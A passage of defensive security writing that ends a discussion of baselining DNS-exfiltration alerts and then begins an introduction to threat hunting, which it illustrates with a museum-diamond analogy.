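Thresholds need a baseline before they are trusted: content delivery networks, anti-virus cloud lookups and some telemetry products also generate many unique subdomains under one zone, and mail servers legitimately issue TXT queries for SPF and DKIM, so the useful hunt question is "which (client, domain) pairs look like this for the first time this week" rather than a fixed cutoff. The approx_bytes_out figure is what turns an alert into an incident scope: it tells you roughly how much left, not just that something did.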

Understanding the Threat Hunting Process Step-by-Step

Threat hunting is the process of detecting and responding to cyber intrusions that network and endpoint security controls have missed. It is also a proactive approach to security that can help organizations identify and mitigate risks before they result in an incident. The stages of threat hunting vary depending on the source you read, though five general stages can be gleaned from the existing literature.

Becoming a Threat Hunter

A rare diamond is on display at a local museum for a few weeks. An efficient security system is in place to ensure the diamond does not get stolen. The system comprises alarms, cameras and trained staff. Even with the security system in place, the staff stay vigilant for theft attempts on the diamond, which includes studying the behaviour of the visitors who come to see it.